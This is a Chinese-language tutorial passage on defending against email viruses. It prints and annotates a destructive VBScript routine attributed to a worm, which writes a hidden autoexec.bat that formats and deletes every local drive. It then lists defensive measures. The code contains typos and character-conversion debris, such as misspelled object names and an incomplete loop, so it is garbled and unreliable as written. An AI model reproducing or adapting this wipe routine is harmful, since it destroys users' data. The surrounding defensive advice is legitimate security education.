4.防止病毒發(fā)作后搞“破壞”
蠕蟲病毒的破壞性大家都有所了解吧?我們以著名的蠕蟲病毒Jessica Worm中的部分破壞代碼為例來加以分析說明:
sub killc() ‘這是子程序,破壞硬盤的過程。
On Error Resume Next‘容錯語句,避免程序崩潰。
dim fs,auto,disc,ds,ss,i,x,dir
Set fs=CreateObjec(“Scipting.FileSystemObject”)
Set auto=fs.CreateTextFile(“c:Autoexec.bat”,True)‘建立或修改自動批處理。
auto.WriteLine(“@echo off”)‘屏蔽掉刪除的進程。
auto.WriteLine(“Smartdrv”)‘加載磁盤緩沖。
Set disc=fs.Drives‘得到驅(qū)動器的集合。
For Each ds in disc
If ds.DriveType=2 Then‘如果驅(qū)動器是本地盤。
ss=ss&ds.DriveLetter‘就將符號連在一起。
End if
Next
ss=LCase(StrReverse(Trim(ss)))‘得到符號串的反向小寫形式。
For i=to Len(ss)‘遍歷每個驅(qū)動器。
x=Mid(ss,i,1) ‘讀每個驅(qū)動器的符號。
auto.WriteLine(“format/autotest/q/u‘&x&’:”) ‘反向(從Z:到A:)自動格式化驅(qū)動器。
Next
Fori=1 to Len(ss)
x=Mid(ss,i,1)
auto.WriteLine(“deltree/y ‘&x&’:”) ‘怕Format失效用Deltree雙保險
Next
auto.Close‘關(guān)閉批處理文件。
set dir=fs.GetFile(“c:Autoexec.bat”)
dir.a(chǎn)ttributes=dir.a(chǎn)tlributes+2 ’將自動批處理文件改為隱藏。
End sub
如果以前沒有親身體驗到蠕蟲病毒的厲害,那么從這個小例子中,應(yīng)該知道蠕蟲病毒的厲害了吧?
電子郵件型病毒不可能像傳統(tǒng)病毒一樣調(diào)用匯編程序來實現(xiàn)破壞功能。它只能通過調(diào)用已經(jīng)編譯好的帶有破壞性的程序來實現(xiàn)這一功能。那么我們就把本地的帶有破壞性的程序改名字,例如把format.com改成fmt.com,那樣病毒的編輯者就無法實現(xiàn)用調(diào)用本地命令來實現(xiàn)這一功能。僅僅如此還不足以真正地防范電子郵件型病毒,我們還要把上面所說的方法結(jié)合起來才可有效防范電子郵件型病毒。另外,還需結(jié)合下面的方法才能更好地防范電子郵件型病毒。
5.通用規(guī)則
(1)在收發(fā)郵件時打開防火墻和殺毒軟件來防殺郵件病毒,這一條沒有什么好說的,應(yīng)該是共識了。
(2)不要輕易暴露自己的信箱地址,注意自己的網(wǎng)上言語,盡量不要得罪人,免得人家攻擊。
(3)發(fā)現(xiàn)郵箱中出現(xiàn)不明來源的郵件應(yīng)小心謹慎對待,遇到帶可執(zhí)行文件(*.EXE,*.COM)或帶有宏功能的附件(*.DOC等),不要選打開,最好先選擇為“另存為”到磁盤上,用殺毒軟件先查殺。
(4)除非必要,盡量關(guān)閉郵件“預覽”特性。很多嵌入在HTML格式郵件中的病毒代碼會在預覽的時候執(zhí)行,我們經(jīng)常從媒體看到這樣一種恐怖說法:“用戶只要收到這些帶病毒的郵件,即使不打開,病毒也能發(fā)作”,其實就是病毒代碼在郵件預覽的時候執(zhí)行的。
(5)設(shè)定郵件的路徑在C盤以外,因為C分區(qū)是病毒攻擊頻率最高的地方,萬一受到防火墻不能過濾的新型病毒攻擊成功,受到的損失也可減少。
(6)收到新郵件盡量使用“另存為”選項為郵件做備份(注意分類儲存,不要在同一根目錄下放全部的郵件)此時還可以為郵件起一個更一目了然的名字,既是備份,又方便管理查閱,一舉兩得。
(7)對于利用文件的擴展名做文章的病毒,不要隱藏系統(tǒng)中已知文件類型的擴展名稱。 Windows操作系統(tǒng)默認的是“隱藏已知文件類型的擴展名稱”。顯示所有文件類型的擴展名稱的方法是(以Windows98系統(tǒng)為例):選擇“控制面板”→“查看”→“文件夾選項”→“查看”→“文件和文件夾”,其中有一項目是“隱含已知文件類型的擴展名”,不選擇該項目即可。當然Windows系統(tǒng)下對于一些特別的文件的擴展名,比如“垃圾蟲ScrapWorm”利用的是“SHS”擴展名稱有特殊的設(shè)置,具有該擴展名稱的文件,即使用戶使用了以上的方法還是不能顯示出其擴展名稱。解決的方法是:在注冊表編輯器HEY_CLASSES_ROOTShellScrap鍵下,有一個鍵值“NeverShowExt”,它是導致“.SHS”文件擴展名無法顯示的罪魁禍首。刪除這個鍵值,就可以看到“.SHS”擴展名了。
(8)將系統(tǒng)的網(wǎng)絡(luò)連接的安全級別設(shè)置至少為“中等”,它可以在一定程度上預防某些有害的Java程序或者某些ActiveX組件對計算機的侵害。點擊“控制面板”中的“Intemet”項目中的“安全”標簽,會出現(xiàn)“Intemet”項的安全級別設(shè)置窗口,將其至少設(shè)置成“中等”級別。單擊菜單欄里“Intemet選項”安全選項卡里的自定義級別按鈕,把“ActiveX控件及插件”的一切設(shè)為禁用,這樣就不怕蠕蟲病毒了。
(9)如果可能,盡量不要使用Outlook Express收發(fā)郵件,可以使用FoxMail等電子郵件客戶端來代替它;另外,要注意為瀏覽器打上最新的補丁;對于通過腳本工作的病毒,可以采用在瀏覽器中禁止Java或ActiveX運行的方法來阻止病毒的發(fā)作。
(10)盡量不要在“通訊簿”中設(shè)置太多的名單,如果要發(fā)送新郵件,可以進入郵件的存儲目錄,打開客戶發(fā)來的郵件,利用“回復”功能來發(fā)送新郵件(刪除原有內(nèi)容即可)如果客戶或朋友較多,利用回復不方便,可以新建一個文本文件(自己做好備份,記得路徑及名稱),把客戶的郵件地址一一列入其中,要發(fā)新郵件的時候,利用“CTRL”+“C”,“CTRL”+“V”快捷鍵把客戶郵件地址粘貼到“收件人”欄中去。這樣雖然麻煩一點,但是有效地防止了郵件病毒的進一步傳播,須知現(xiàn)在的郵件病毒變種既多更新又快,防殺難免有漏洞,病毒一發(fā)作,就自動復制無數(shù)復本發(fā)送到“通訊簿”里所有的用戶。用此法可以避免病毒的擴散,特別是有商業(yè)關(guān)系的客戶不會因此受到牽連,發(fā)生誤會從而影響合作關(guān)系。此法還可起到保密客戶的作用,因為名單文本的目錄和名稱只有本機主人才知道。
通過以上的層層設(shè)防,用戶的系統(tǒng)應(yīng)該能防御絕大多數(shù)的郵件型病毒了。